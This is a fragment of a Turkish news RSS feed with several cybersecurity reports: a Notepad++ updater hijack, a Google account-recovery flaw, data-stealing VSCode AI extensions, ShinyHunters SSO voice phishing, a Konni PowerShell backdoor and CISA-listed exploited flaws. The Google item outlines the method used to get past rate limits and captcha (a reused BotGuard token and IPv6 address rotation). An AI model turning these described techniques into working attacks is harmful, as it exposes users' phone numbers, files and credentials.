<p data-start="1251" data-end="1649"><strong data-start="1251" data-end="1288">“Hedefli ve Seçici Bir Operasyon”</strong><br>Onur Oktay, saldırının geniş kitleleri kapsayan rastgele bir girişim olmadığını vurgulayarak, “Bu operasyon herkese açık bir saldırı değildi. Belirli IP blokları veya coğrafi bölgelerdeki kullanıcılar hedef alındı.” ifadelerini kullandı. Elde edilen bulguların, saldırının <strong data-start="1562" data-end="1599">Çin devlet destekli bir APT grubu</strong> tarafından yürütüldüğüne işaret ettiği aktarıldı.</p>
<p data-start="1651" data-end="2075"><strong data-start="1651" data-end="1696">Zafiyet Kaynak Kodda Değil Güncelleyicide</strong><br>Oktay’ın değerlendirmesine göre, Notepad++’ın kaynak kodunda herhangi bir güvenlik açığı tespit edilmedi. Ancak WinGUp aracının, indirilen dosyaların <strong data-start="1847" data-end="1915">dijital imza ve sertifika doğrulamasını yeterince sıkı yapmaması</strong>, saldırının başarıya ulaşmasına neden oldu. Hosting seviyesinde gerçekleştirilen <strong data-start="1997" data-end="2018">Man-in-the-Middle</strong> yönlendirmesiyle sahte güncellemeler meşru kabul edildi.</p>
<p data-start="2077" data-end="2430"><strong data-start="2077" data-end="2110">Alınan Önlemler ve Yeni Sürüm</strong><br>Olayın ardından Notepad++ tarafında hosting sağlayıcısı değiştirildi, tüm erişim bilgileri sıfırlandı ve <strong data-start="2216" data-end="2226">v8.8.9</strong> sürümü yayımlandı. Bu sürümle birlikte güncelleyicinin, indirilen paketlerin imza ve sertifikalarını <strong data-start="2328" data-end="2361">zorunlu olarak kontrol ettiği</strong>, doğrulama başarısız olursa güncellemenin iptal edildiği kaydedildi.</p>
<p data-start="2432" data-end="2922"><strong data-start="2432" data-end="2466">Kullanıcılara Güvenlik Uyarısı</strong><br>Saldırının hedefe özel zararlı yazılımlar içermesi nedeniyle tek bir dosya imzası bulunmadığına dikkat çekildi. Şüpheli ağ trafiği ve <strong data-start="2601" data-end="2675">%TEMP% klasöründe Notepad++ imzası taşımayan çalıştırılabilir dosyalar</strong>, olası bulaş göstergeleri arasında yer aldı. Onur Oktay, v8.8.9 öncesi sürümleri kullananların uygulama içinden güncelleme yapmaması ve ilgili dönemde güncelleme alan sistemlerin <strong data-start="2855" data-end="2890">EDR veya antivirüs çözümleriyle</strong> taranması gerektiğini belirtti.</p>
<p data-start="2924" data-end="3210"><strong data-start="2924" data-end="2960">Yeni Güvenlik Katmanları Geliyor</strong><br>Geliştirici ekip tarafından, ilerleyen sürümlerde <strong data-start="3011" data-end="3045">XML dijital imzalama (XMLDSig)</strong> desteğinin devreye alınacağı duyuruldu. Olayın, yazılım güvenliği kadar <strong data-start="3118" data-end="3142">altyapı güvenliğinin</strong> de kritik önemde olduğunu bir kez daha ortaya koyduğu ifade edildi.</p>
<p><b>Ajans Expres Gazetesi</b></p>]]> </content:encoded>
</item>

<item>
<title>Google Hesap Kurtarma Açığı Ortaya Çıktı: Herhangi Bir Kullanıcının Telefon Numarası Sızdırılabildi</title>
<link>https://www.ajansexpres.com.tr/google-hesap-kurtarma-acigi-ortaya-cikti-herhangi-bir-kullanicinin-telefon-numarasi-sizdirilabildi</link>
<guid>https://www.ajansexpres.com.tr/google-hesap-kurtarma-acigi-ortaya-cikti-herhangi-bir-kullanicinin-telefon-numarasi-sizdirilabildi</guid>
<description><![CDATA[ Bir güvenlik araştırmacısı, Google’ın JavaScript’siz çalışan kullanıcı adı kurtarma sisteminde yer alan bir açık sayesinde, belirli koşullar altında herhangi bir Google kullanıcısına ait telefon numarasının tespit edilebildiğini ortaya koydu. Açık, Google tarafından doğrulandı, ödüllendirildi ve küresel olarak kapatıldı. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202601/image_870x580_697bc31ce573d.webp" length="42856" type="image/jpeg"/>
<pubDate>Thu, 29 Jan 2026 23:29:37 +0300</pubDate>
<dc:creator>HABER SEFİ</dc:creator>
<media:keywords>google hesap kurtarma açığı nedir, google telefon numarası sızıntısı nasıl gerçekleşti, google botguard güvenlik zafiyeti, google no js formu kapatıldı mı</media:keywords>
<content:encoded><![CDATA[<p>Bir güvenlik araştırmacısı, Google hesap kurtarma altyapısında yer alan ve uzun süredir fark edilmeyen bir zafiyet sayesinde, <strong data-start="585" data-end="665">herhangi bir Google kullanıcısına ait telefon numarasının sızdırılabildiğini</strong> açıkladı. Açık, Google’ın JavaScript devre dışı bırakıldığında da çalışan <strong data-start="740" data-end="772">kullanıcı adı kurtarma formu</strong> üzerinden istismar edilebildi.</p>
<p></p>
<p data-start="805" data-end="1146">Araştırmacı, JavaScript kapalıyken dahi çalışan bu formun, belirli HTTP istekleri aracılığıyla bir telefon numarasının belirli bir ad-soyad ile eşleşip eşleşmediğini doğruladığını tespit etti. Bu mekanizma sayesinde, doğru parametreler kullanıldığında bir Google hesabının varlığı ve ilişkili telefon numarası hakkında doğrulama yapılabildi.</p>
<p data-start="1148" data-end="1492"><strong data-start="1148" data-end="1185">İki Aşamalı Doğrulama Mekanizması</strong><br>İlk aşamada, hesap kurtarma formuna girilen telefon numarasıyla bir oturum anahtarı üretildi. İkinci aşamada ise bu anahtar kullanılarak ad ve soyad bilgileriyle doğrulama yapıldı. Sistem, eşleşme durumunda kullanıcıyı farklı bir kurtarma sayfasına yönlendirerek hesabın varlığını dolaylı olarak doğruladı.</p>
<p data-start="1494" data-end="1824">Başlangıçta IP bazlı hız sınırlaması ve captcha engeliyle karşılaşan araştırmacı, <strong data-start="1576" data-end="1609">BotGuard doğrulama token’ının</strong>, JavaScript’li formdan alınıp JavaScript’siz forma entegre edilmesiyle bu engellerin aşıldığını belirtti. Bu yöntemle, veri merkezi IP’leri üzerinden dahi yüksek hacimli sorguların mümkün hale geldiği ifade edildi.</p>
<p data-start="1826" data-end="2129"><strong data-start="1826" data-end="1861">IPv6 ve Büyük Ölçekli Denemeler</strong><br>Araştırmada, IPv6 adres alanlarının sunduğu genişlikten faydalanılarak her istek için farklı bir IP kullanıldığı, bu sayede hız sınırlamalarının etkisiz hale getirildiği kaydedildi. Araştırmacı, geliştirdiği araçla saniyede on binlerce deneme yapılabildiğini aktardı.</p>
<p data-start="2131" data-end="2441"><strong data-start="2131" data-end="2183">Ülke Kodu ve İsim Bilgileri de Tespit Edilebildi</strong><br>Telefon numarasının ülke kodu, Google’ın “şifremi unuttum” akışında gösterdiği maskeli numara formatları üzerinden belirlenebildi. Araştırmacı, bu formatların Google’ın kullandığı açık kaynaklı <strong data-start="2378" data-end="2396">libphonenumber</strong> kütüphanesiyle birebir örtüştüğünü belirtti.</p>
<p data-start="2443" data-end="2684">Kullanıcının ad ve soyad bilgisine ise Google Looker Studio üzerinden ulaşıldı. Araştırmacı, oluşturulan bir belgenin hedef kullanıcıya devredilmesiyle, <strong data-start="2596" data-end="2674">kullanıcının hiçbir etkileşimi olmadan adının ana sayfada görüntülendiğini</strong> kaydetti.</p>
<p data-start="2686" data-end="3025"><strong data-start="2686" data-end="2740">“İstismar Olasılığı Düşük Denildi, Ödül Artırıldı”</strong><br>Açık, 14 Nisan 2025’te Google’a bildirildi. Google, ilk değerlendirmede istismar olasılığını düşük bularak sınırlı bir ödül verdi. Araştırmacının itirazı sonrası yapılan yeniden değerlendirmede ise etkinin yüksek olduğu kabul edilerek ödül toplam <strong data-start="2988" data-end="3003">5 bin dolar</strong> seviyesine çıkarıldı.</p>
<p data-start="3027" data-end="3259">Google, 22 Mayıs 2025 itibarıyla geçici önlemlerin devreye alındığını, 6 Haziran 2025’te ise <strong data-start="3120" data-end="3203">JavaScript’siz kullanıcı adı kurtarma formunun tamamen devre dışı bırakıldığını</strong> doğruladı. Açık, 9 Haziran 2025’te kamuoyuna açıklandı.</p>
<p data-start="3261" data-end="3426"></p><br><p><b>Ajans Expres Gazetesi</b></p>]]> </content:encoded>
</item>

<item>
<title>VSCode Marketplace’teki yapay zekâ eklentileri geliştirici verilerini Çin merkezli sunuculara sızdırdı</title>
<link>https://www.ajansexpres.com.tr/vscode-marketplaceteki-yapay-zeka-eklentileri-gelistirici-verilerini-cin-merkezli-sunuculara-sizdirdi</link>
<guid>https://www.ajansexpres.com.tr/vscode-marketplaceteki-yapay-zeka-eklentileri-gelistirici-verilerini-cin-merkezli-sunuculara-sizdirdi</guid>
<description><![CDATA[ Microsoft’un Visual Studio Code Marketplace’inde yer alan ve toplamda yaklaşık 1,5 milyon kez indirilen iki yapay zekâ destekli kodlama eklentisinin, geliştiricilere ait dosyaları ve davranış verilerini izinsiz biçimde Çin merkezli sunuculara aktardığı ortaya çıktı. Güvenlik araştırmacıları, kampanyanın geniş çaplı bir tedarik zinciri riski oluşturduğunu bildirdi. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202601/image_870x580_697635ed5a47f.webp" length="54454" type="image/jpeg"/>
<pubDate>Sun, 25 Jan 2026 18:27:48 +0300</pubDate>
<dc:creator>HABER SEFİ</dc:creator>
<media:keywords>vscode marketplace zararlı eklenti, yapay zekâ kod asistanı veri sızıntısı, maliciouscorgi kampanyası nedir, geliştirici verileri nasıl çalındı</media:keywords>
<content:encoded><![CDATA[<p><br>Visual Studio Code kullanıcılarını hedef alan yeni bir güvenlik araştırması, Marketplace’te bulunan iki popüler yapay zekâ eklentisinin geliştirici verilerini izinsiz biçimde dış sunuculara aktardığını ortaya koydu. <strong data-start="734" data-end="750">Koi Security</strong> araştırmacıları, söz konusu eklentilerin “<strong data-start="793" data-end="811">MaliciousCorgi</strong>” adı verilen bir kampanyanın parçası olduğunu ve aynı casus yazılım altyapısını kullandığını açıkladı.</p>
<p></p>
<p data-start="916" data-end="1154">Araştırmaya göre eklentiler, yapay zekâ tabanlı kodlama asistanı olarak tanıtılıyor ve vaat edilen işlevleri sunuyor. Ancak arka planda, kullanıcı onayı almadan dosya içeriklerini ve davranış verilerini Çin merkezli sunuculara gönderiyor.</p>
<p data-start="1156" data-end="1439"><strong data-start="1156" data-end="1185">1,5 milyona yakın indirme</strong><br>VSCode Marketplace’te hâlen erişilebilir durumda olduğu belirtilen eklentiler şunlar:<br><strong data-start="1272" data-end="1289">ChatGPT – 中文版</strong> (WhenSunset tarafından yayımlandı, yaklaşık 1,34 milyon indirme)<br><strong data-start="1355" data-end="1378">ChatMoss (CodeMoss)</strong> (zhukunpeng tarafından yayımlandı, yaklaşık 150 bin indirme)</p>
<p data-start="1441" data-end="1579">Koi Security, her iki eklentinin de aynı veri hırsızlığı kodlarını kullandığını ve aynı arka uç sunucularıyla iletişim kurduğunu kaydetti.</p>
<p data-start="1581" data-end="1974"><strong data-start="1581" data-end="1626">Dosyalar açıldığı anda dışarı aktarılıyor</strong><br>Araştırmacılar, eklentilerin üç ayrı veri toplama mekanizması kullandığını bildirdi. İlk yöntemde, VSCode içinde açılan her dosya anlık olarak izleniyor. Dosya yalnızca açıldığında bile, tüm içeriği <strong data-start="1826" data-end="1857">Base64 formatına çevrilerek</strong> saldırganların sunucularına gönderiliyor. Dosyada yapılan her değişikliğin de aynı şekilde aktarıldığı ifade edildi.</p>
<p data-start="1976" data-end="2144">Koi araştırmacıları, “Herhangi bir dosyayı açtığınız anda, içeriğin tamamı kodlanıp gizli bir izleme bileşeni üzerinden dışarı aktarılıyor.” değerlendirmesinde bulundu.</p>
<p data-start="2146" data-end="2453"><strong data-start="2146" data-end="2188">Uzaktan komutla toplu dosya hırsızlığı</strong><br>İkinci mekanizmada ise sunucu kontrollü bir komut aracılığıyla, kurbanın çalışma alanından <strong data-start="2280" data-end="2312">50’ye kadar dosyanın gizlice</strong> dışarı aktarılabildiği tespit edildi. Bu yöntemin, hassas proje dosyaları ve yapılandırma içerikleri için ciddi risk oluşturduğu vurgulandı.</p>
<p data-start="2455" data-end="2873"><strong data-start="2455" data-end="2489">Kullanıcı profilleme ve izleme</strong><br>Üçüncü mekanizma ise doğrudan kullanıcı izlemeye odaklanıyor. Eklentilerin web arayüzü içinde sıfır piksel boyutunda bir iframe aracılığıyla <strong data-start="2631" data-end="2686">Zhuge.io, GrowingIO, TalkingData ve Baidu Analytics</strong> gibi ticari analiz araçlarını yüklediği belirlendi. Bu araçların, kullanıcı davranışlarını izlemek, cihaz parmak izi çıkarmak ve kimlik profilleri oluşturmak için kullanıldığı aktarıldı.</p>
<p data-start="2875" data-end="3157"><strong data-start="2875" data-end="2925">Kaynak kodlar ve gizli anahtarlar risk altında</strong><br>Koi Security, belgelenmemiş bu işlevlerin; <strong data-start="2969" data-end="3105">özel kaynak kodlarının, yapılandırma dosyalarının, bulut servis kimlik bilgilerinin ve .env dosyalarında yer alan API anahtarlarının</strong> açığa çıkmasına yol açabileceği uyarısında bulundu.</p>
<p data-start="3159" data-end="3497"><strong data-start="3159" data-end="3190">Microsoft inceleme başlattı</strong><br>BleepingComputer’ın ulaştığı Microsoft yetkilileri, konuya ilişkin inceleme başlatıldığını doğruladı. Microsoft sözcüsü, “Bu raporu inceliyoruz ve süreçlerimiz ile politikalarımız doğrultusunda gerekli adımları atacağız.” açıklamasını yaptı. Eklenti geliştiricileriyle ise iletişim kurulamadığı bildirildi.</p>
<p data-start="3499" data-end="3657"><strong data-start="3499" data-end="3511"></strong></p><br><p><b>Ajans Expres Gazetesi</b></p>]]> </content:encoded>
</item>

<item>
<title>ShinyHunters grubu Okta ve Microsoft SSO hesaplarını hedef alan veri hırsızlığı saldırılarını üstlendi</title>
<link>https://www.ajansexpres.com.tr/shinyhunters-grubu-okta-ve-microsoft-sso-hesaplarini-hedef-alan-veri-hirsizligi-saldirilarini-ustlendi</link>
<guid>https://www.ajansexpres.com.tr/shinyhunters-grubu-okta-ve-microsoft-sso-hesaplarini-hedef-alan-veri-hirsizligi-saldirilarini-ustlendi</guid>
<description><![CDATA[ ShinyHunters fidye ve şantaj grubu, Okta, Microsoft Entra ve Google tek oturum açma hizmetlerini hedef alan devam eden sesli oltalama saldırılarının arkasında olduğunu doğruladı. Saldırılarda çalışanların kandırılarak SSO hesaplarının ele geçirildiği ve kurumsal SaaS platformlarından veri çalındığı bildirildi. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202601/image_870x580_697635f6b5198.webp" length="54774" type="image/jpeg"/>
<pubDate>Sun, 25 Jan 2026 18:27:18 +0300</pubDate>
<dc:creator>HABER SEFİ</dc:creator>
<media:keywords>shinyhunters kimdir, okta sso saldırısı nasıl yapıldı, microsoft entra sesli oltalama, sso hesaplarıyla veri hırsızlığı</media:keywords>
<content:encoded><![CDATA[<p><br>ShinyHunters olarak bilinen şantaj grubu, Okta, Microsoft Entra ve Google <strong data-start="537" data-end="562">tek oturum açma (SSO)</strong> hesaplarını hedef alan saldırıların bir bölümünün sorumluluğunu üstlendi. <strong data-start="637" data-end="657">BleepingComputer</strong> tarafından aktarılan bilgilere göre saldırılar, çalışanların telefonla aranarak IT destek personeli gibi davranılması ve kimlik bilgileri ile çok faktörlü kimlik doğrulama kodlarının oltalama sitelerine girilmesinin sağlanması yoluyla gerçekleştirildi.</p>
<p></p>
<p data-start="912" data-end="1158">Saldırganlar, ele geçirilen SSO hesapları üzerinden kurumsal SaaS platformlarına erişim sağladı. Uzmanlar, tek bir SSO hesabının ele geçirilmesinin, bağlı uygulamalar nedeniyle <strong data-start="1089" data-end="1134">şirket sistemlerine geniş kapsamlı erişim</strong> sunduğuna dikkat çekti.</p>
<p data-start="1160" data-end="1514"><strong data-start="1160" data-end="1209">SSO panelleri kurumsal sistemlere açılan kapı</strong><br>Okta, Microsoft Entra ve Google tarafından sunulan SSO hizmetleri, çalışanların bulut servisleri, iç araçlar ve iş platformlarına tek bir girişle erişmesini sağlıyor. Bu panellerde bağlı tüm uygulamaların listelenmesi, ele geçirilen bir hesabı <strong data-start="1454" data-end="1496">kurumsal veriler için kritik bir geçit</strong> hâline getiriyor.</p>
<p data-start="1516" data-end="1690">SSO üzerinden sıkça erişilen platformlar arasında <strong data-start="1566" data-end="1663">Salesforce, Microsoft 365, Google Workspace, Dropbox, Adobe, SAP, Slack, Zendesk ve Atlassian</strong> gibi hizmetler yer alıyor.</p>
<p data-start="1692" data-end="2015"><strong data-start="1692" data-end="1747">Sesli oltalama ile gerçek zamanlı MFA yönlendirmesi</strong><br>BleepingComputer’ın daha önce bildirdiği üzere saldırganlar, çalışanları telefonla arayarak IT birimi gibi davranıyor ve oltalama sayfalarına yönlendiriyor. Kurbanlar giriş yaptığında ve MFA süreci başladığında, saldırganlar gerçek zamanlı olarak yönlendirme yapıyor.</p>
<p data-start="2017" data-end="2353">Okta tarafından yayımlanan raporda, bu saldırılarda kullanılan oltalama kitlerinin <strong data-start="2100" data-end="2134">web tabanlı bir kontrol paneli</strong> içerdiği belirtildi. Bu panel sayesinde saldırganlar, telefon görüşmesi sırasında kurbana gösterilen ekranları anlık olarak değiştirerek MFA onayı, TOTP kodu girişi veya bildirim onaylatma adımlarını yönlendirebiliyor.</p>
<p data-start="2355" data-end="2656"><strong data-start="2355" data-end="2393">ShinyHunters saldırıları doğruladı</strong><br>ShinyHunters, BleepingComputer’a yaptığı açıklamada, “Bu saldırıların arkasında olduğumuzu doğruluyoruz.” ifadesini kullandı. Grup, “Salesforce birincil ilgi ve hedefimiz olmaya devam ediyor, diğerleri ise bundan faydalanan unsurlar.” değerlendirmesinde bulundu.</p>
<p data-start="2658" data-end="2907">Grup, saldırılarda kullanılan altyapı ve alan adlarına ilişkin bazı detayları doğrularken, Okta’nın paylaştığı bir oltalama kontrol sunucusu ekran görüntüsünün kendilerine ait olmadığını, kendi platformlarının şirket içinde geliştirildiğini savundu.</p>
<p data-start="2909" data-end="3240"><strong data-start="2909" data-end="2944">Şirketlerden farklı açıklamalar</strong><br>Microsoft, konuya ilişkin paylaşacak bir bilgi olmadığını bildirirken, Google ise ürünlerinin kampanya kapsamında kötüye kullanıldığına dair kanıt bulunmadığını açıkladı. Google sözcüsü, “Şu aşamada Google’ın kendisinin veya ürünlerinin bu kampanyadan etkilendiğine dair bir bulgumuz yok.” dedi.</p>
<p data-start="3242" data-end="3416">Okta ise veri hırsızlığı iddialarına doğrudan yorum yapmazken, sesli oltalama saldırılarında kullanılan araçlara ilişkin teknik detayları içeren raporunu kamuoyuyla paylaştı.</p>
<p data-start="3418" data-end="3755"><strong data-start="3418" data-end="3476">Önceki veri sızıntıları yeni saldırılarda kullanılıyor</strong><br>ShinyHunters, daha önceki büyük veri ihlallerinden elde edilen bilgileri kullanarak çalışanlara ulaştığını öne sürdü. Bu veriler arasında telefon numaraları, unvanlar ve isimlerin yer aldığı, bu sayede sosyal mühendislik aramalarının daha inandırıcı hâle getirildiği belirtildi.</p>
<p data-start="3757" data-end="4061">Grup, Tor ağı üzerindeki veri sızıntı sitesini yeniden faaliyete geçirdi. Sitede <strong data-start="3838" data-end="3878">SoundCloud, Betterment ve Crunchbase</strong> ihlallerinin listelendiği görüldü. Crunchbase, kurumsal ağından bazı belgelerin sızdırıldığını doğrularken, olayın kontrol altına alındığını ve sistemlerin güvenli olduğunu açıkladı.</p>
<p data-start="4063" data-end="4197"><strong data-start="4063" data-end="4075"></strong></p><br><p><b>Ajans Expres Gazetesi</b></p>]]> </content:encoded>
</item>

<item>
<title>Kuzey Kore bağlantılı Konni hacker grubu yapay zekâ ile üretilmiş zararlı yazılımla blokzincir mühendislerini hedef aldı</title>
<link>https://www.ajansexpres.com.tr/kuzey-kore-baglantili-konni-hacker-grubu-yapay-zeka-ile-uretilmis-zararli-yazilimla-blokzincir-muhendislerini-hedef-aldi</link>
<guid>https://www.ajansexpres.com.tr/kuzey-kore-baglantili-konni-hacker-grubu-yapay-zeka-ile-uretilmis-zararli-yazilimla-blokzincir-muhendislerini-hedef-aldi</guid>
<description><![CDATA[ Kuzey Kore bağlantılı Konni hacker grubunun, blokzincir geliştiricileri ve mühendislerini hedef alan yeni bir siber casusluk kampanyasında yapay zekâ destekli PowerShell zararlı yazılım kullandığı ortaya çıktı. Check Point araştırmacıları, saldırıların Asya-Pasifik bölgesine yoğunlaştığını ve gelişmiş gizleme teknikleri içerdiğini açıkladı. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202601/image_870x580_697635e5cd34e.webp" length="40624" type="image/jpeg"/>
<pubDate>Sun, 25 Jan 2026 18:26:48 +0300</pubDate>
<dc:creator>HABER SEFİ</dc:creator>
<media:keywords>konni hacker grubu nedir, yapay zekâ ile üretilmiş zararlı yazılım, blokzincir geliştiricilerine siber saldırı, kuzey kore bağlantılı hackerlar</media:keywords>
<content:encoded><![CDATA[<p><br>Siber güvenlik araştırmacıları, Kuzey Kore bağlantılı <strong data-start="566" data-end="595">Konni (Opal Sleet, TA406)</strong> hacker grubunun, blokzincir sektöründe çalışan geliştirici ve mühendislere yönelik yeni bir saldırı kampanyası yürüttüğünü tespit etti. <strong data-start="732" data-end="747">Check Point</strong> tarafından analiz edilen örneklere göre saldırılarda, <strong data-start="802" data-end="900">yapay zekâ yardımıyla oluşturulduğu değerlendirilen PowerShell tabanlı bir arka kapı zararlısı</strong> kullanıldı.</p>
<p></p>
<p data-start="914" data-end="1279">Konni grubunun, <strong data-start="930" data-end="950">APT37 ve Kimsuky</strong> faaliyet kümeleriyle bağlantılı olduğu, en az 2014 yılından bu yana Güney Kore, Rusya, Ukrayna ve çeşitli Avrupa ülkelerini hedef aldığı biliniyor. Son kampanyada ise odak noktasının <strong data-start="1134" data-end="1158">Asya-Pasifik bölgesi</strong> olduğu, zararlı yazılım örneklerinin <strong data-start="1196" data-end="1232">Japonya, Avustralya ve Hindistan</strong> kaynaklı olarak sisteme yüklendiği kaydedildi.</p>
<p data-start="1281" data-end="1677"><strong data-start="1281" data-end="1320">Discord bağlantılı oltalama zinciri</strong><br>Saldırı zinciri, hedef kişilere <strong data-start="1353" data-end="1398">Discord üzerinden gönderilen bir bağlantı</strong> ile başlıyor. Bu bağlantı, içerisinde bir PDF yem dosyası ve <strong data-start="1460" data-end="1495">zararlı bir LNK kısayol dosyası</strong> bulunan ZIP arşivini indiriyor. LNK dosyası çalıştırıldığında, gömülü PowerShell yükleyici devreye giriyor ve bir DOCX belgesi ile arka kapıyı içeren CAB arşivini sisteme çıkarıyor.</p>
<p data-start="1679" data-end="2034">Kısayol dosyasının çalıştırılmasıyla DOCX belgesi açılırken, aynı anda zararlı CAB içindeki <strong data-start="1771" data-end="1799">batch dosyalarından biri</strong> çalıştırılıyor. Check Point, yem belgesinin içerik itibarıyla geliştiricilerin çalışma ortamlarını hedef aldığını ve <strong data-start="1917" data-end="1993">altyapı erişimi, API anahtarları, cüzdan yetkileri ve kripto varlıkların</strong> ele geçirilmesini amaçladığını belirtti.</p>
<p data-start="2036" data-end="2400"><strong data-start="2036" data-end="2069">Zamanlanmış görev ve iz silme</strong><br>İlk batch dosyası, arka kapı için bir hazırlık dizini oluştururken, ikinci batch dosyası <strong data-start="2159" data-end="2231">OneDrive başlangıç görevi gibi görünen saatlik zamanlanmış bir görev</strong> tanımlıyor. Bu görev, disk üzerinde XOR ile şifrelenmiş PowerShell betiğini çözüp bellekte çalıştırıyor ve ardından kendini silerek bulaşma izlerini ortadan kaldırıyor.</p>
<p data-start="2402" data-end="2730"><strong data-start="2402" data-end="2441">Yapay zekâ izleri taşıyan arka kapı</strong><br>PowerShell arka kapısının; aritmetik tabanlı kodlama, çalışma anında dize oluşturma ve <strong data-start="2529" data-end="2550">Invoke-Expression</strong> kullanımıyla yoğun biçimde gizlendiği aktarıldı. Check Point araştırmacıları, kodun yapısının <strong data-start="2645" data-end="2710">insan eliyle yazılmış geleneksel zararlı yazılımlardan farklı</strong> olduğunu vurguladı.</p>
<p data-start="2732" data-end="3134">Araştırmacılar, betiğin başındaki düzenli dokümantasyon, modüler ve temiz kod yapısı ile <strong data-start="2821" data-end="2859">“# &lt;– your permanent project UUID”</strong> ifadesinin, yapay zekâ tarafından üretilmiş kodlarda sıkça görülen bir özellik olduğunu kaydetti. Check Point, “Bu tür ifadeler, büyük dil modellerinin kullanıcıya bir yer tutucunun nasıl özelleştirileceğini anlatan tipik çıktılarıyla örtüşüyor.” değerlendirmesinde bulundu.</p>
<p data-start="3136" data-end="3428"><strong data-start="3136" data-end="3175">Analiz ortamlarına karşı kontroller</strong><br>Zararlı yazılım çalışmadan önce donanım, yazılım ve kullanıcı etkileşimi kontrolleri yaparak analiz ortamlarında olup olmadığını tespit etmeye çalışıyor. Ardından cihaza özgü bir kimlik oluşturuyor ve yetki seviyesine göre farklı eylem yolları izliyor.</p>
<p data-start="3430" data-end="3694">Arka kapı etkin hâle geldikten sonra, rastgele zaman aralıklarıyla <strong data-start="3497" data-end="3527">komuta-kontrol sunucusuyla</strong> iletişime geçerek temel sistem bilgilerini iletiyor. Sunucudan PowerShell kodu içeren bir yanıt alınması hâlinde, bu kod arka planda eş zamanlı olarak çalıştırılıyor.</p>
<p data-start="3696" data-end="4047"><strong data-start="3696" data-end="3724">Konni ile ilişkilendirme</strong><br>Check Point, saldırıların Konni grubuna atfedilmesini; daha önce görülen yükleyici formatları, yem dosyası isimleri, betik adları ve geçmiş kampanyalarla örtüşen çalıştırma zinciri yapısına dayandırdı. Araştırmacılar, savunma ekiplerinin önlem alabilmesi için kampanyaya ait <strong data-start="4000" data-end="4026">zararlı göstergelerini</strong> kamuoyuyla paylaştı.</p>
<p data-start="4049" data-end="4207"><strong data-start="4049" data-end="4061"></strong></p><br><p><b>Ajans Expres Gazetesi</b></p>]]> </content:encoded>
</item>

<item>
<title>CISA dört kurumsal yazılım açığının aktif olarak istismar edildiğini doğruladı federal kurumlara süre verdi</title>
<link>https://www.ajansexpres.com.tr/cisa-doert-kurumsal-yazilim-aciginin-aktif-olarak-istismar-edildigini-dogruladi-federal-kurumlara-sure-verdi</link>
<guid>https://www.ajansexpres.com.tr/cisa-doert-kurumsal-yazilim-aciginin-aktif-olarak-istismar-edildigini-dogruladi-federal-kurumlara-sure-verdi</guid>
<description><![CDATA[ ABD Siber Güvenlik ve Altyapı Güvenliği Ajansı CISA, Versa, Zimbra, Vite ve Prettier bileşenlerini etkileyen dört kritik güvenlik açığının siber saldırganlar tarafından aktif olarak kullanıldığını açıkladı. Açıklar KEV kataloğuna eklenirken, federal kurumlara 12 Şubat 2026’ya kadar güncelleme veya kullanım durdurma zorunluluğu getirildi. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202601/image_870x580_697635dc68283.webp" length="72684" type="image/jpeg"/>
<pubDate>Sun, 25 Jan 2026 18:26:10 +0300</pubDate>
<dc:creator>HABER SEFİ</dc:creator>
<media:keywords>cisa aktif olarak istismar edilen açıklar, kev kataloğu nedir, versa concerto güvenlik açığı, zimbra webmail zafiyeti</media:keywords>
<content:encoded><![CDATA[<p><br>ABD Siber Güvenlik ve Altyapı Güvenliği Ajansı <strong data-start="543" data-end="551">CISA</strong>, kurumsal yazılımları etkileyen dört farklı güvenlik açığının <strong data-start="614" data-end="650">aktif olarak istismar edildiğini</strong> duyurdu. Versa ve Zimbra ürünleri ile <strong data-start="689" data-end="697">Vite</strong> ön yüz geliştirme aracı ve <strong data-start="725" data-end="737">Prettier</strong> kod biçimlendirme bileşenini kapsayan açıklar, <strong data-start="785" data-end="826">KEV – Known Exploited Vulnerabilities</strong> kataloğuna eklendi.</p>
<p></p>
<p data-start="848" data-end="1100">CISA, kataloğa eklenen açıklar için kurumun sahada istismar edildiğine dair kanıt bulunduğunu bildirdi. Ajans, bu kapsamda federal kurumların <strong data-start="990" data-end="1003">BOD 22-01</strong> direktifi doğrultusunda güncelleme yapmasını veya ürünleri kullanmayı bırakmasını zorunlu kıldı.</p>
<p data-start="1102" data-end="1521"><strong data-start="1102" data-end="1152">Vite framework açığı dosya ifşasına yol açıyor</strong><br>İstismar edilen açıklar arasında <strong data-start="1186" data-end="1204">CVE-2025-31125</strong> yer alıyor. Yüksek önem derecesine sahip bu açık, sunucunun doğrudan internete açık olduğu durumlarda <strong data-start="1307" data-end="1365">izin verilmeyen dosyaların erişilebilir hâle gelmesine</strong> neden oluyor. Açığın yalnızca geliştirme ortamlarında etkili olduğu, sorunun <strong data-start="1443" data-end="1485">6.2.4, 6.1.3, 6.0.13, 5.4.16 ve 4.5.11</strong> sürümlerinde giderildiği aktarıldı.</p>
<p data-start="1523" data-end="1927"><strong data-start="1523" data-end="1576">Versa Concerto’da kritik kimlik doğrulama atlatma</strong><br>CISA tarafından aktif istismar altında olduğu belirtilen bir diğer açık ise <strong data-start="1653" data-end="1671">CVE-2025-34026</strong> oldu. Kritik seviyedeki bu zafiyet, <strong data-start="1708" data-end="1733">Versa Concerto SD-WAN</strong> orkestrasyon platformunda kimlik doğrulama atlatılmasına olanak tanıyor. Açığın, Traefik ters proxy yapılandırma hatasından kaynaklandığı ve yönetici uç noktalarına erişim sağladığı belirtildi.</p>
<p data-start="1929" data-end="2215">Etkilenen sürümlerin <strong data-start="1950" data-end="1980">Concerto 12.1.2 ile 12.2.0</strong> aralığında olduğu, ancak başka sürümlerin de risk altında olabileceği ifade edildi. Açığın, <strong data-start="2073" data-end="2093">ProjectDiscovery</strong> araştırmacıları tarafından 13 Şubat 2025’te bildirildiği, Versa’nın ise 7 Mart 2025’te düzeltmeyi yayımladığı kaydedildi.</p>
<p data-start="2217" data-end="2584"><strong data-start="2217" data-end="2263">Prettier tedarik zinciri saldırısı listede</strong><br>CISA, <strong data-start="2270" data-end="2288">CVE-2025-54313</strong> kodlu açığın da saldırılarda kullanıldığını açıkladı. Bu açık, <strong data-start="2352" data-end="2378">eslint-config-prettier</strong> paketini hedef alan bir <strong data-start="2403" data-end="2436">tedarik zinciri saldırısından</strong> kaynaklandı. Temmuz 2025’te npm üzerinden yayımlanan zararlı sürümlerin, Windows sistemlerde npm kimlik doğrulama anahtarlarını çaldığı bildirildi.</p>
